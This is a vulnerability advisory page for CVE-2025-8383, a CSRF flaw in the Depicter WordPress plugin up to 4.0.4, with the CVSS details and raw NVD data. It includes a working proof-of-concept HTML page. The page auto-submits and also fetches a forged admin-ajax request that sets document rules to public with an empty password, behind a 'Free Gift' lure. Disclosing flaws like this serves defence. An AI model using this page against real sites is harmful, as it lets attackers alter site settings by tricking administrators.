Security Vulnerability Report
中文
CVE-2025-8383 CVSS 4.3 MEDIUM

CVE-2025-8383

Published: 2025-10-31 09:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Depicter plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions less than, or equal to, 4.0.4. This is due to missing or incorrect nonce validation on the depicter-document-rules-store function. This makes it possible for unauthenticated attackers to modify document rules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Depicter plugin for WordPress <= 4.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-8383 --> <!-- Depicter Plugin < =4.0.4 Document Rules Modification --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Depicter Document Rules</title> </head> <body> <h1>Depicter CSRF Exploit - CVE-2025-8383</h1> <p>Click the button below to modify document rules</p> <form action="https://target-site.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="depicter-document-rules-store"> <input type="hidden" name="document_id" value="1"> <input type="hidden" name="rules" value='{"access":"public","password":""}'> <!-- Missing nonce field - this is the vulnerability --> <button type="submit" id="exploitBtn">Click for Free Gift!</button> </form> <script> // Auto-submit form without user knowledge document.getElementById('csrfForm').submit(); // Alternative: Send via fetch API fetch('https://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams({ 'action': 'depicter-document-rules-store', 'document_id': '1', 'rules': JSON.stringify({ 'access': 'public', 'password': '' }) }) }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8383", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:48.573", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Depicter plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions less than, or equal to, 4.0.4. This is due to missing or incorrect nonce validation on the depicter-document-rules-store function. This makes it possible for unauthenticated attackers to modify document rules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://drive.google.com/file/d/1Fph3k-uyN6tX4hHeupjdYsZWZe3gYjqo/view?usp=sharing", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/depicter/trunk/app/routes/ajax.php#L473", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3384613/", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-8383/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c54e5cd9-cc51-4367-afe0-11a6abfc0437?source=cve", "source": "[email protected]"}]}}